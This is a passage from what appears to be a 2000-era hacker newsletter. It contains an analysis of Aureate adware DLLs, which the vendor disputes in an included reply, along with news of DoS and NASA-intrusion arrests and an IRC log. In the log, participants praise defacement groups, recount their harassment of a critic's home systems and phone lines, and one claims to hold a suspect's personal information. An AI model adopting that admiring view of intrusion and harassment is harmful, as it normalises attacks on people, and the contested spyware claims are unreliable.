    > > > ProtectX 3
    > > > ProxyChecker
    > > > QuadSucker/Web
    > > > Quadzle Puzzles
    > > > QuikLink Autobot
    > > > QuikLink Explorer
    > > > QuikLink Explorer Gold Edition
    > > > QuoteWatch
    > > > QWallet
    > > > Real Estate Web Site Creator
    > > > Recipe Review
    > > > ReGet 1.6
    > > > Resume Detective
    > > > RingSurf
    > > > RoboCam 1.10
    > > > Rosemary's Weird Web World
    > > > SaberQuest Page Burner
    > > > SBJV
    > > > SBWcc
    > > > Scout's Game
    > > > ScreenFIRE
    > > > ScreenFIRE - FileKing
    > > > ScreenFlavors
    > > > Sea Battle
    > > > Shizzam
    > > > Simple Submit
    > > > SimpleFind
    > > > SimpleSubmit v1.0
    > > > SK-111
    > > > Smart 'n Sticky
    > > > SmartBoard 200 FREE Edition
    > > > SmartSum calculator
    > > > SonicMail
    > > > Sound Agent
    > > > Space Central Screen Saver
    > > > Splash! Siterave
    > > > StartDrive
    > > > Static FTP
    > > > StockBrowser
    > > > Subscriber
    > > > SunEdit 2K
    > > > SuperIDE
    > > > Sweep
    > > > SweepsWinner
    > > > Text Transmogrifier
    > > > The Mapper
    > > > TheNet
    > > > TI-FindMail
    > > > TIFNY
    > > > Total Finger
    > > > Total Whois
    > > > Tracking The Eye
    > > > Trade Site Creator
    > > > TWinExplorer Standard
    > > > TypeWriter 1.0
    > > > UK Phone Codes
    > > > Vagabond's Realm
    > > > VeriMP3
    > > > Vertigo QSearch
    > > > Virtual Access
    > > > Visual Cyberadio
    > > > Visual Surfer
    > > > VOG Backgammon Main
    > > > VOG Backgammon Table
    > > > VOG Chess Main
    > > > VOG Chess Table
    > > > VOG Reversi Main
    > > > VOG Reversi Table
    > > > VOG Shell
    > > > VOG Shell
    > > > VOG Shell History
    > > > W3Filer
    > > > Web Coupon
    > > > Web Page Authoring Software
    > > > Web Registrant PRO
    > > > Web Resume
    > > > Web SurfACE
    > > > WEB2SMS
    > > > WebCamVCR
    > > > WebCopier
    > > > Web-N-Force
    > > > WebSaver
    > > > Website Manager
    > > > WebStripper
    > > > WebType
    > > > WhoIs Thingy
    > > > Win A Lotto
    > > > WinEdit 2000
    > > > Word+
    > > > Wordwright
    > > > WorldChat Client
    > > > Worm
    > > > www.devgames.com
    > > > xBlock
    > > > Your ESP Test
    > > > Zion
    > > > Zip Express 2000
    > > >
    > > > _________________________________________
    > > > List Owner: Lewis Rose, lewrose@arentfox.com
    > > > Web Site: http://www.net-lawyers.org
    > > > Archives: http://eva.dc.lsoft.com/Archives/net-lawyers.html
    > > >
    > > > http://www.prairielaw.com "The #1 law destination..."
    > > > Participate in our
    > > > message
    > > > boards, e-mail discussion groups, and chats. Network with other legal
    > > > professionals; get opinions from experts; offer assistance to
    > > > consumers.
    > > >
    > >
    > > _____________________________________________________________________
    > > ** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice"
    > > ** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST"
    > > SEND ALL COMMANDS TO: listserv@listserv.ntsecurity.net
    > 
    > _____________________________________________________________________
    > ** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice"
    > ** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST"
    > SEND ALL COMMANDS TO: listserv@listserv.ntsecurity.net
    
    
     -=-
     
     Submitted by TRDonJuan: (* source not posted)
     
      Zor, this is something you might want to forward on to your readers somehow.
      The following is a listing of all software known to install the Aureate
      spy on your system. The Aureate spy keeps track of your Internet
      activities and sends a report to Aureate every time you open your
      browser. The Aureate spy places the following files on a Windows
      machine. [It is not known, yet, to affect Macintosh or Linux machines.]
      
      > The installed files are some or all of:
      
      > adimage.dll
      > advert.dll
      > advpack.dll
      > amcis.dll
      > amcis2.dll
      > amcompat.tlb
      > amstream.dll
      > anadsc.ocx
      > anadscb.ocx
      > htmdeng.exe
      > ipcclient.dll
      > msipcsv.exe
      > tfde.dll
      >
      > Here is a review of  the contents and
      > code contained in the DLL's that Aureate makes use of.  Here are a
      > few of my findings up to this point:
      >
      > advert.dll
      > =======
      >
      > This DLL creates a hidden window every time you open your browser. It
      > creates and sends 4 pages of information to the Aureate servers using
      > port 1749 on your system, these pages include:
      >
      > 1. Your name as listed in the system registry ( not the name you
      > installed one of the programs with )
      > 2. Your IP address
      > 3. The reverse DNS match of your address. ( tells them what ISP and
      > area of country you are in )
      > 4. A listing of ALL software that is shown in your registry as being
      > installed. ( Not just the companies they work with )
      > 5. This DLL sends the following information to their server on all
      > URL's you visit:
      >      A.) ad banners you may click on
      >      B.) all downloads you do showing the filename/file
      > size/date/time/type of file(image, zip,executable, etc)
      >      C.) full time and date stamps of all your actions while
      > using your
      >  browser
      >      D.) the remote dialup number you are dialing in on (taken out of
      > your dialer configuration)
      >      E.) dialup password if saved, does not "appear" at first glance
      > to send this through to them.
      >   6. Contains programmers note: "Show me the money! I want to
      > be Mike!"
      >
      >
      > advpack.dll
      > =========
      >
      > Used during the installation only to check for other needed files.
      > amcis.dll
      > =======
      >
      > This DLL modifies the following registry keys:
      >    1. HKEY_CURRENT_CONFIG
      >     2. HKEY_DYN_DATA
      >     3. HKEY_PERFORMANCE_DATA
      >     4. HKEY_USERS
      >     5. HKEY_LOCAL_MACHINE
      >     6. HKEY_CURRENT_USER
      >     7. HKEY_CLASSES_ROOT
      >
      > Unregisterss oleaut32.dll from memory as provided by M$oft and
      > replaces with its own calls. Switches back to M$oft's when browser is
      > closed. Creates stub processes to be started anytime your browser is
      > opened.
      >
      >
      > amcompat.tlb
      > ===========
      >
      > This guy tracks any multimedia clips ( video/pictures/sound ) that
      > you view It tracks the rating level on the video/picture/sound and
      > title / location Contains references to DblClick ( still digging on
      > this one! )
      >
      >
      > amstream.dll
      > ==========
      >
      > Setups TWO way communications between your system and theirs.
      > Used to send info and receive update commands/files
      > Open port 1749 for communications
      >
      > ==================================================
      >
      > The programs that are known to install the Aureate spy are:
      >
      > 123Search
      > 3d Anarchy
      > 3D-FTP
      > 3rd block
      > Abe's FTP Client
      > Abe's Image Viewer
      > Abe's MP3 Finder
      > Abe's Picture Finder
      > Abe's SMB Client
      > Access Diver III
      > Acorn Email
      > AcqURL
      > ActionOutline Light 1.6
      > Active 'Net
      > Add URL
      > Add/Remove Plus!
      > Address Rover 98
      > Admiral VirusScanner
      > Advanced Call Center
      > Advanced Maillist Verify
      > AdWizard
      > Alive and Kicking
      > alphaScape QuickPaste
      > ASP1-A3
      > Auction Explorer
      > Aureate Group Mail
      > Aureate SpamKiller
      > AutoFTP PRO
      > AutoWeb
      > AxelCD
      > Beatle
      > Binary Boy
      > BinaryVortex
      > Blue Engine
      > BookSmith : Original
      > buddyPhone 2
      > Calypso E-mail
      > CamGrab
      > Capture Express 2000
      > Cascoly Screensaver
      > CDDB-Reader
      > CDMaster32
      > ChanStat
      > Charity Banner
      > Cheat Machine
      > Check4New
      > ChinMail
      > Clabra clipboard viewer
      > Classic Peg Solitaire
      > ComTry Music Downloader
      > Crystal FTP
      > CSE HTML Validator Lite
      > CuteFTP 3.0
      > CuteFTP 3.0
      > CuteFTP/Tripod
      > CuteMX
      > CutePage
      > Danzig Pref Engine
      > DateTime
      > Delphi Component Test
      > Delphi Tester
      > Dialer 2000
      > DigiBand NewsWatch
      > DigiCams - The WebCam Viewer
      > Digital Postman
      > DirectUpdate
      > DL-Mail Pro 2000
      > DNScape
      > Doorbell 1.18
      > Download Minder 1.5
      > Download Wonder
      > DownLoader v.1.1
      > Dwyco Video Conferencing
      > EasySeeker
      > EmmaSoft ChatCat
      > EmmaSoft dBrow
      > EmmaSoft KeepLan
      > EmmaSoft Soundz
      > EnvoyMail
      > EZ-Forms FREE
      > File Mag-Net
      > FileSplit
      > Folder Guard Jr.
      > FourTimes
      > Free Picture Harvester
      > Free Solitaire
      > Free Spades
      > Free Submitter Pro
      > FreeImageEditor
      > FreeIRC
      > FreeNotePad
      > FreeSite
      > FreeWebBrowser
      > FreeWebMail
      > FreeZip!
      > FTPEditor
      > GetRight
      > Go!Zilla
      > Go!Zilla WebAttack
      >     GovernMail
      > Grafula
      > Gunther's PasswordSentry
      > HangWeb
      > hesci Private Label
      > HTML Translator
      > HTTP Proxy-Spy
      > Huey v1.8 Color Picker
      > Iban Technologies IP Tools 3.1
      > Idyle GimmIP
      > Idyle GimmIP
      > iFind Graphics
      > imageN
      > Infinite Patience
      > InfoBlast
      > InnovaClub
      > InstallZIP
      > Internet Tree
      > Internetrix
      > InterWebWord Companion
      > JetCar
      > JFK Research
      > jIRC
      > JOC Email Checker
      > JOC Web Finder
      > JOC Web Spider
      > KVT Diplom
      > LapLink FTP
      > LineSoft Download
      > LOL Chat
      > LOL Chat
      > Mail Them
      > Meracl FontMap
      > Meracl ImageMap Generator
      > Midnight Oil Solitaire
      > MirNik Internet Finder
      > More Space 99
      > MouseAssist
      > MP3 Album Finder
      > MP3 Fiend
      > MP3 Grouppie
      > MP3 Mag-Net
      > MP3 Renamer
      > Mp3 Stream Recorder
      > MP3INFO-Editor
      > MultiSender
      > Music Genie
      > MX Inspector BIG AD
      > My Genie Patriots
      > My Genie SE
      > My GetRight
      > NeatFTP
      > Net CB
      > Net Scan 2000
      > Net Vampire
      > Net-A-Car Feature Car Screensaver
      > NetAnts
      > NetBoard
      > Netbus Pro 2.10
      > NetCaptor 5.0
      > Netman Downloader
      > NetNak
      > NetSuck 3.10.5
      > NetTime Thingy
      > Network Assistant
      > NeuroStock
      > NewsBin
      > NewsShark
      > NewsWire
      > NfoNak
      > NotePads+
      > Notificator 1.0b
      > Octopus
      > Pattern Book
      > People Seek 98
      > Personal Search Agent
      > Photocopier
      > PicPluck
      > Pictures In News
      > Ping Thingy
      > PingMaster
      > Planet.Billboard
      > Planet.MP3Find
      > PMS
      > ProtectX 3
      > ProxyChecker
      > QuadSucker/Web
      > Quadzle Puzzles
      > QuikLink Autobot
      > QuikLink Explorer
      > QuikLink Explorer Gold Edition
      > QuoteWatch
      > QWallet
      > Real Estate Web Site Creator
      > Recipe Review
      > ReGet 1.6
      > Resume Detective
      > RingSurf
      > RoboCam 1.10
      > Rosemary's Weird Web World
      > SaberQuest Page Burner
      > SBJV
      > SBWcc
      > Scout's Game
      > ScreenFIRE
      > ScreenFIRE - FileKing
      > ScreenFlavors
      > Sea Battle
      > Shizzam
      > Simple Submit
      > SimpleFind
      > SimpleSubmit v1.0
      > SK-111
      > Smart 'n Sticky
      > SmartBoard 200 FREE Edition
      > SmartSum calculator
      > SonicMail
      > Sound Agent
      > Space Central Screen Saver
      > Splash! Siterave
      > StartDrive
      > Static FTP
      > StockBrowser
      > Subscriber
      > SunEdit 2K
      > SuperIDE
      > Sweep
      > SweepsWinner
      > Text Transmogrifier
      > The Mapper
      > TheNet
      > TI-FindMail
      > TIFNY
      > Total Finger
      > Total Whois
      > Tracking The Eye
      > Trade Site Creator
      > TWinExplorer Standard
      > TypeWriter 1.0
      > UK Phone Codes
      > Vagabond's Realm
      > VeriMP3
      > Vertigo QSearch
      > Virtual Access
      > Visual Cyberadio
      > Visual Surfer
      > VOG Backgammon Main
      > VOG Backgammon Table
      > VOG Chess Main
      > VOG Chess Table
      > VOG Reversi Main
      > VOG Reversi Table
      > VOG Shell
      > VOG Shell
      > VOG Shell History
      > W3Filer
      > Web Coupon
      > Web Page Authoring Software
      > Web Registrant PRO
      > Web Resume
      > Web SurfACE
      > WEB2SMS
      > WebCamVCR
      > WebCopier
      > Web-N-Force
      > WebSaver
      > Website Manager
      > WebStripper
      > WebType
      > WhoIs Thingy
      > Win A Lotto
      > WinEdit 2000
      > Word+
      > Wordwright
      > WorldChat Client
      > Worm
      > www.devgames.com
      > xBlock
      > Your ESP Test
      > Zion
      > Zip Express 2000
      
      sincerely
      
      aCiD buRn
      
      -=-
      
      follow up submitted by TRDonJuan (* no source) reportedly a response
      from aureate.
      
      :
      
      A variety of false rumors have been started, and we would appreciate
      your help in finding the source of these rumors so that we can clarify
      what our technology actually does and put these to rest.
      As you may already know, what Aureate Media does is work with software
      companies to make their products advertising supported. Aureate's
      technology allows for these advertisements to be delivered and displayed
      within the software products of these software products.
      
      The following concerns are those that have been brought to our
      attention. If you have additional
      concerns, please do contact us directly.
      
      Advert.dll creates a hidden window every time you open your browser
      
      This is true, but this happens because of the way that Microsoft Windows
      networking works. You will find that in running almost any windows
      program that hidden windows are created as this is how the OS was
      designed.
      
      Advert.dll creates and sends 4 pages of information to Aureate on port
      1749
      
      We aren't sure exactly what is being referred to here. The first time
      someone installs software they are presented with an optional
      demographic survey (none of the information is required), and this
      information is sent to us one time (after the survey is completed).
      Prior to answering these questions, the user is presented with
      information explaining why we ask  these questions and how the answers
      are used. The information sent is only the information provided.
      The use of port 1749 is misleading, as again this is something built
      into the way that Microsoft
      Windows networking works. Windows will pick a high numbered port (1500+)
      in a largely random fashion. Again, this is how the OS works.
      
      Advert.dll will send your name to Aureate as it is listed in the system
      registry
      
         Completely false.
      
      Advert.dll will send your IP address to Aureate Your IP address is sent,
      again because of the way that Microsoft Windows networking and TCP/IP
      protocol works. An IP address is
      obviously required in order to communicate with an internet server in
      any instance.
      
       Advert.dll performs a reverse DNS lookup on your IP address
      
       Here again, it is Microsoft Windows networking that does this as part
      of the OS networking system.
      
      Advert.dll creates a process anytime your browser is open.
      
      This is true. This process delivers advertisements to a cache on the
      users PC which are displayed while the software is being run. This works
      in a similar way to how the browser works, with content and images
      (including ads) being delivered to a cache on the users PC and then are
      displayed in the browser window.
      
      Advert.dll sends a list of all software listed in your registry
      
      Completely false.
      
      Advert.dll sends a list of all URL's you click on/visit
      
      Completely false.
      
      Advert.dll sends a list of all ad banners you click on
      
      Completely false. We will of course know when you click on an ad banner
      that we delivered such that we can send the user to that advertisers web
      site in the same way that any ad network works.
      
      Advert.dll will send all downloads you perform and related information
      
      Completely false.
      
      Advert.dll will send full time and date stamps of all your actions while
      you use your browser.
      
      Completely false.
      
      Advert.dll contains the string "Show me the money! I want to be Mike!"
      
      This is true. It's a text string used by the DLL. DLLs contain many text
      strings which are used by the DLL itself. For example, if a particular
      program displayed a window which contained the text "Hello World", then
      the "Hello World" text string would be present inside that DLL.
      
      Advpack.dll (and all comments relating to it)
      
      Completely false. Advpack.dll is not one of our DLLs.
      
      Amcis.dll modifies the following registry keys: (list of keys removed)
      
      Amcis.dll will only add itself to the HKEY_CLASSES_ROOT registry key, as
      does any DLL installed on your system. It simply tells Windows where to
      find the DLLs your programs use.
      
      Amcompat.tlb (and all comments relating to it)
      
      Completely false. Amcompat.tlb is not one of our files.
      
      Amstream.dll (and all comments relating to it)
      
      Completely false. Amstream.dll is not one of our DLLs.
      
      If you have any further questions, please don't hesitate to call or
      write.
      
      Thanks,
      Jeremy
      
       ----
      Jeremy J. Newton, VP Sales
      Aureate Media Corporation
      
      @HWA
      
      
     
     

      @HWA      
                                 
12.0  German youth charged in DoS attacks
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      German article: http://www.heise.de/newsticker/data/nl-22.02.00-000/
     
      Translated from German by Xistence 
      (HWA Dutch/German translator)
      
      
      NetCologne Saboteur busted

      One young man with the nickname "n0tty" has caused 41 disturbances at NetCologne.
      The 19 year old guy attacked the communicationhardware of the provider NetCologne
      (in the neighbourhood of Kiel) with a Denial-of-Service attack. NetCologne estimates the
      losses at about one million mark (about $600.000).

      First trails pointed to a southern German university. n0tty abused several systems of students with
      a false identy using a "bouncer" and installed a Hacker-Tool called "Redirect" which he used to
      bomb the ISP. n0ttys used variants of "UDP-Bombing" which where small data packets sended rapidly
      after eachother.

      During a search of the apartment house they found loads of electronic equipment, mainly
      the booty of several failures. With the hearing gave itself the surprised one
      confessing. 

     
      NetCologne Saboteur calm 

      A young man with the alias " n0tty " has 41 in Cologne granted disturbances
      opposite the Kriminalkommissariat with NetCologne to have caused. During 
      three days the 19-jaehrige had disturbed beginning communication electronics
      engineers from the proximity of Kiel with an Denial OF service attack the 
      Internet acces of the Providers NetCologne. Netcologne numbers the developed
      damage on approximately a million Mark. 

      First determinations led to the server of a South German university; over 
      this way "n0tty " had abused the acces of several students and under false
      identity a program ("Bouncer ") installed and with the help of the hacker 
      Tools " Redirect " to other Internet user bombarded n0ttys version of the 
      " UDP Bombings ", with which small packets in fast frequency are transmitted
      on a computer, actually applied one <?snip?>
      
      
      Original article...

      NetCologne-Saboteur gefasst

      Ein junger Mann mit dem Pseudonym "n0tty" hat gegenber dem Kriminalkommissariat
      41 in Kln eingerumt Strungen bei NetCologne verursacht zu haben. Whrend dreier
      Tage hatte der 19-jhrige angehende Kommunikationselektroniker aus der Nhe von 
      Kiel mit einem Denial-of-Service-Angriff die Internet-Zugnge des Providers 
      NetCologne gestrt. Netcologne beziffert den entstandenen Schaden auf rund eine 
      Million Mark. 

      Erste Ermittlungen fhrten zum Server einer sddeutschen Universitt; ber diesen
      Weg hatte "n0tty" die Zugnge mehrerer Studenten missbraucht und unter falscher 
      Identitt ein Programm ("Bouncer") installiert und mit Hilfe des Hacker-Tools 
      "Redirect" fremde Internetnutzer bombardiert. n0ttys Variante des "UDP-Bombings",
      bei dem kleine Datenpakete in schneller Frequenz auf einen Rechner gesendet 
      werden, galt eigentlich einem konkurrierenden Hacker-Kollegen.

      Bei einer Wohnungsdurchsuchung wurden die Ermittler schnell fndig. n0ttys
      Zimmer war mit elektronischem Equipment bestckt, hauptschlich der Beute 
      mehrerer Einbrche. Bei der Venehmung  gab sich der Ertappte gestndig. 
      (Frank Mcke) (nl/c't)                                  
      
      
      @HWA
      
      
      
13.0  HNN: Feb 24th: DigiAlmty, NASA hacker gets nabbed
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
      DigiAlmty Busted By Feds 


      contributed by McIntyre 
      DigiAlmty (Ikenna Iffih), a 28-year-old Northeastern
      University student, has been charged with electronically
      breaking into the computer systems of NASA and the
      Pentagon. In April of 1999 DigiAlmty was charged with
      illegally gaining access to the systems of the Defense
      Logistics Agency and several commercial systems. Since
      then the case has been expanded and now includes
      intrusions of Northeastern, NASA and the pentagon.
      DigiAlmty has also been accused of illegally copying
      some files and destroying others. If found guilty,
      DigiAlmty could face up to ten years in prison and
      $250,000 in fines. U.S. Attorney Donald Stern said "All in
      all, the defendant used his home computer to leave a
      trail of cybercrime from coast to coast." (If this guy
      "left a trail from coast to coast" what took them so
      bloody long to drop the hammer?) 

      DigiAlmty (Ikenna Iffih) was a member of the
      Northeastern Chapter of the Association for Computing
      Machinery. 
      
      Mirror of ACM Member Page
      http://www.attrition.org/~mcintyre/digi/www.ccs.neu.edu/groups/acm/members.html
      
      Mirror of DigiAlmty's Home Page at Northeastern
      http://www.attrition.org/~mcintyre/digi/www.ccs.neu.edu/home/ikiffih/
      
      Mirrors of DigiAlmty Defacements 
      http://www.attrition.org/mirror/attrition/digia.html
      

      Agence France-Press - via Nando Times
      http://www2.nando.net:80/noframes/story/0,2107,500172150-500222086-50105851-0,00.html
      
      Associated Press - via Boston Globe
      http://www.boston.com/dailynews/054/region/Hacker_faces_charges_in_NASA_a:.shtml
      
      Reuters -
      http://www.wired.com/news/technology/0,1282,34539,00.html
      
      
      http://www.boston.com/dailynews/054/region/Hacker_faces_charges_in_NASA_a:.shtml
      
      Hacker faces charges in NASA
      and Interior cases 

      By Martin Finucane, Associated Press, 2/23/2000 20:13 

      BOSTON (AP) Federal authorities charged a college student
      Wednesday with breaking into government and military
      computers, including systems run by NASA, the Defense
      Department and the Interior Department. 

      The U.S. attorney's office accused Ikenna Iffih, 28, a student
      at Northeastern University who lives in Boston, in a
      three-count criminal information, or statement of charges. 

      Iffih's attorney, Charles McGinty, didn't immediately return a
      message seeking comment. If convicted, Iffih faces a
      maximum penalty of 10 years in prison and a fine of $250,000.
      He has an unlisted phone number and he could not be
      reached for comment. 

      Iffih had been charged in August in Seattle, but the case has
      been expanded and moved to Boston. 

      ''All in all, the defendant used his home computer to leave a
      trail of cybercrime from coast to coast,'' U.S. Attorney Donald
      Stern said in a statement. 

      Iffih was charged with gaining access in April 1999 to a
      Defense Logistics Agency computer located in Columbus,
      Ohio, then accessing the computer used by Zebra Marketing
      Online Services, an Internet service provider located in
      Bainbridge Island, Wash. 

      Then in May 1999, Iffih allegedly accessed a NASA computer
      located at the Goddard Space Flight Center in Greenbelt, Md.
      Using the NASA computer as a platform, he gained
      unauthorized access to other computer systems, including the
      Department of Interior Web server. 

      ''The defendant gained illegal access ... either causing
      substantial business loss, defacing a Web page with hacker
      graphics, copying personal information or, in the case of a
      NASA computer, effectively seizing control,'' Stern said. 

      Iffih also allegedly obtained unauthorized access to various
      computers owned and operated by Northeastern University,
      unlawfully copying private information concerning students,
      faculty administrators and alumni. 

      Prosecutors said there was no disruption to the nation's
      defenses and no meddling with satellite control and no
      improper use of private information, but that ZMOS, the
      Internet provider, suffered a ''significant loss of business.'' 

      The Interior Department attack was one of several against
      high-profile government and military Web sites throughout the
      spring and early summer retaliating over FBI raids nationwide
      of several prominent hackers, including one who ultimately
      pleaded guilty to breaking into the White House computers. 

      The FBI raids were ''pretty public, and it raised a lot of
      hackles,'' said B.K. DeLong, a staff member at Attrition.Org, a
      Web site devoted to computer security that maintains an
      archive of vandalized Web pages. ''It caused many people to
      publish banners and deface Web sites in the name of stopping
      the raids.'' 

      The Interior Department Web site one of those Iffih is charged
      with vandalizing was hit in May by a hacker known on the
      Internet as ''DigiAlmty,'' who wrote that ''It's our turn to hit them
      where it hurts... We'll keep hitting them 'till they get down on
      their knees and beg.'' 

      In a search of Iffih's home in Boston last fall, authorities said,
      they found a one-page computer printout, containing the user
      name ''DigiAlmty.'' 

      Steve Schroeder, an assistant U.S. attorney in Seattle, said
      there were indications that Iffih and ''DigiAlmty'' might be one
      and the same. Schroeder wouldn't elaborate. 

      Iffih, who remains free, is a ''pretty bright guy, relatively
      sophisticated,'' Schroeder said. 

      Iffih is a student at Northeastern's College of Computer
      Science. 

      Northeastern spokeswoman Janet Hookailo said, ''We have
      been cooperating with authorities since last fall. We'll continue
      to do so.'' 

      Hookailo said university officials also planned to meet with Iffih
      as soon as possible to discuss the allegations. 
      
      @HWA
      
14.0  Discussion on DigiAlmty and general underground chat
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Contributed and edited by Cruciphux
      
      Source: Private IRC channel
      
      Machine names, nick names  and certain info has been deleted from 
      this log but it is for the most part intact and makes good reading
      and additional info to section 13.0
      
      Session Start: Thu Feb 24 12:47:10 2000
      [12:47] *** Now talking in #???
      [12:47] *** Topic is 'our temp. messageboard at: http://,.
      [12:47] *** Set by slash__ on Thu Feb 24 09:53:24
      #??? created on Thu Feb 24 06:19:31
      <Cruciphux> op me
      [12:47] *** slashh sets mode: +o Cruciphux
      [12:47] *** Cruciphux sets mode: -k trash
      [12:48] *** Joins: <unknown>
      [12:48] *** Cruciphux sets mode: +k thrash
      [12:48] *** Cruciphux sets mode: +o <unknown>
      [12:48] <slashh> k
      [12:48] <slashh> thnx
      [12:50] *** Joins: nf0-man (~w00t@hidden.host.??)
      [12:50] <slashh> sup
      [12:50] <slashh> sup
      [12:50] <slashh> check the msg board
      [12:50] <nf0-man> this is fucking bullshit
      [12:50] <nf0-man> !@#
      [12:50] <nf0-man> fuck
      [12:50] <slashh> what ?
      [12:51] <nf0-man> my friend is got busted
      [12:51] *** slashh sets mode: +o nf0-man
      [12:51] <slashh> what ?!?
      [12:51] <nf0-man> and now they are trying to screw him
      [12:51] <slashh> who !??
      [12:51] <nf0-man> DigiAlmty
      [12:51] <nf0-man> 10 years in prison if he's found guilty
      [12:51] <slashh> ohh
      [12:51] <slashh> I read that
      [12:51] <slashh> no shit 1???????
      [12:51] <nf0-man> yah...
      [12:51] <nf0-man> he was a good friend of mine
      [12:51] <slashh> shit
      [12:51] <nf0-man> and he's not the type to delete files or be malacious
      [12:51] <slashh> yeah ?!
      [12:51] <slashh> I saw his defacments
      [12:52] <nf0-man> he always installed tcpwrappers and secured shit and 
                        never  messed with anything except defacements      
      [12:52] <nf0-man> index.htm
      [12:52] <slashh> though luch
      [12:52] <slashh> luck
      [12:52] <nf0-man> thats bullshit
      [12:52] <nf0-man> is what it is
      [12:52] <nf0-man> he doesnt deserve this
      [12:52] <nf0-man> zyklon broke into the damn whitehouse and he only got 
                        15 months !$
      [12:53] <slashh> ...
      [12:53] <slashh> dont't know what to say......
      [12:53] <slashh> it sucks      
      
      <SNIP> 
      
      [12:54] <nf0-man> and another thing...
      [12:54] <nf0-man> a long time ago last year
      [12:54] <slashh> yeah.. ?
      [12:54] <nf0-man> DigiAlmty showed me an e-mail
      [12:54] *** Joins: ethO (~unknown@momma.luvs.yu)
      [12:54] <nf0-man> that mosthated sent to all the admins of the sites he 
                        broke into
      [12:54] <slashh> from whom ?
      [12:54] <ethO> hey
      [12:54] <ethO> :)
      [12:54] <nf0-man> mosthated quoted in that interview someone put in HWA...
      [12:54] <nf0-man> "I want to devote my time catching these individuals that
                        deface websites for fun"
      [12:54] <slashh> cruciphux did the interview
      [12:55] <nf0-man> theres a statement rite there
      [12:55] <slashh> who said that !?!!
      [12:55] <nf0-man> mosthated said something exactly like that
      [12:55] <nf0-man> in the interview in HWA
      [12:55] <slashh> no shit ?!
      [12:55] <nf0-man> you never trust anyone who's been raided
      [12:55] <nf0-man> because they all change
      [12:55] <nf0-man> and it was publicly told
      [12:56] <slashh> damn....
      [12:56] <nf0-man> that mosthated was working with the government for months 
      [12:56] <ethO> slashh. did you test pirchslap.c?
      [12:56] <nf0-man> before any of the raids
      [12:56] <slashh> no
      [12:56] <slashh> eth0
      [12:56] <nf0-man> this was on 20/20      
      [12:56] <ethO> ..
      [12:56] <nf0-man> a while ago
      [12:56] <slashh> lamagra's gonna sk00l U on coding in C
      [12:56] <nf0-man> the only group thats ever defaced
      [12:56] <nf0-man> that I have any respect for
      [12:56] <nf0-man> is H4G1S
      [12:56] <slashh> w0rd
      [12:57] <ethO> slashh. huh?
      [12:57] <nf0-man> tr0ut is going through bullshit to
      [12:57] <nf0-man> he's a fellow canadian as well
      [12:57] <nf0-man> 6 months + 7,000 dollar fine for defacing nasa.gov
      [12:57] <slashh> didn;t know that
      [12:57] <nf0-man> he's a member of h4g1s
      [12:57] <nf0-man> or was anyways
      [12:58] <nf0-man> it's usually not wise to mess with people like them
      [12:58] <nf0-man> c0mega of attrition did
      [12:58] <nf0-man> and they fucked his life up
      [12:58] <slashh> yea h?!?
      [12:58] <slashh> how ?
      [12:58] <nf0-man> made him loose his wife and all that
      [12:58] <nf0-man> hacked into all his home systems and his wifes work
      [12:58] <slashh> no shit?!?!!
      [12:58] <nf0-man> and his
      [12:58] <slashh> how did they do that ?!
      [12:58] <nf0-man> disconnected his phone lines
      [12:58] <slashh> damn.,.....
      [12:58] <ethO> defacing will only get you into trouble..
      [12:58] <nf0-man> and his business phones
      [12:58] <slashh> these guys are really elite
      [12:59] <nf0-man> H4G1S is the best so far 
      [12:59] <nf0-man> besides the originals like LOD and masters of deception
      [12:59] <slashh> damn...
      [12:59] <nf0-man> coolio...
      [12:59] <nf0-man> the person supposedly
      [12:59] <slashh> yeah ?
      [12:59] <nf0-man> responsible for the DoS attacks
      [12:59] <slashh> what about him ?
      [12:59] <nf0-man> he's going to get a surprise
      [13:00] *** ethO is now known as misteri0
      [13:00] <nf0-man> I have his infos
      [13:00] <slashh> no shit !??????????/
      [13:00] <slashh> where did U get it ?
      [13:00] <nf0-man> someone gave them to me
      [13:00] <slashh> U gonna get him raided ?
      [13:00] <nf0-man> no
      [13:00] <misteri0> slashh. are there any new members?
      [13:00] <nf0-man> that would be like narcing on someone
      [13:00] <nf0-man> fuck that
      [13:00] <nf0-man> im just saying
      [13:00] <nf0-man> he should be careful
      [13:00] <slashh> yah
      [13:00] <nf0-man> because alot of people have his info
      [13:01] <nf0-man> and alot of people don't like him
      [13:01] <slashh> he's gonna get busted for shure
      [13:01] <nf0-man> the f3ds have his info
      [13:01] <nf0-man> they got it from RSA
      [13:01] <misteri0> bah, slassh, are tehre any new members!?
      [13:01] <slashh> w00w
      [13:02] <slashh> he's going top get fucked
      [13:02] <nf0-man> all the people I know are getting screwed
      [13:02] <slashh> that's why
      [13:02] <slashh> we won't be involved in any defacments
      [13:03] <nf0-man> i got tired of that shit
      [13:03] <nf0-man> to many new kids and there little msadc
      [13:03] <slashh> :)
      [13:03] <slashh> say..
      [13:03] <nf0-man> slipy and egodeath of hv2k got busted to
      [13:03] <slashh> how do U know all that shit about h4g1s
      [13:03] <slashh> yeah ?
      [13:03] <slashh> I dindn;t know that
      [13:03] <nf0-man> I know alot about the whole defacing thing
      [13:03] <nf0-man> and shit
      [13:03] <misteri0> damn, you guys are speaking anoher lang..
      [13:04] <nf0-man> ive been around since 97 in it
      [13:04] <slashh> I started 98
      [13:04] <misteri0> nf0-man. is gh still around?
      [13:04] <nf0-man> oh and ADM are leet, even thpugh they defaced
      [13:04] <misteri0> globall hell
      [13:05] <slashh> yeah
      [13:05] <slashh> they are still around
      [13:05] <nf0-man> hmmm
      [13:05] <nf0-man> slash...
      
      <SNIP>  (personal dissing)    
      
      [13:07] <nf0-man> DigiAlmty better not be found guilty though
      [13:07] <misteri0> thx
      [13:07] <slashh> np
      [13:07] <slashh> he is in deep shit
      [13:07] <nf0-man> if he is
      [13:08] <nf0-man> yah
      [13:08] <nf0-man> gH people broke into the boxes that digia got into
      [13:08] <nf0-man> they hacked his BNC's and shit
      [13:08] <slashh> yeah
      [13:08] <slashh> I read his defacments
      [13:08] <nf0-man> up to no good
      [13:09] <slashh> wargames and shit......
      [13:09] <nf0-man> its also amusing that....
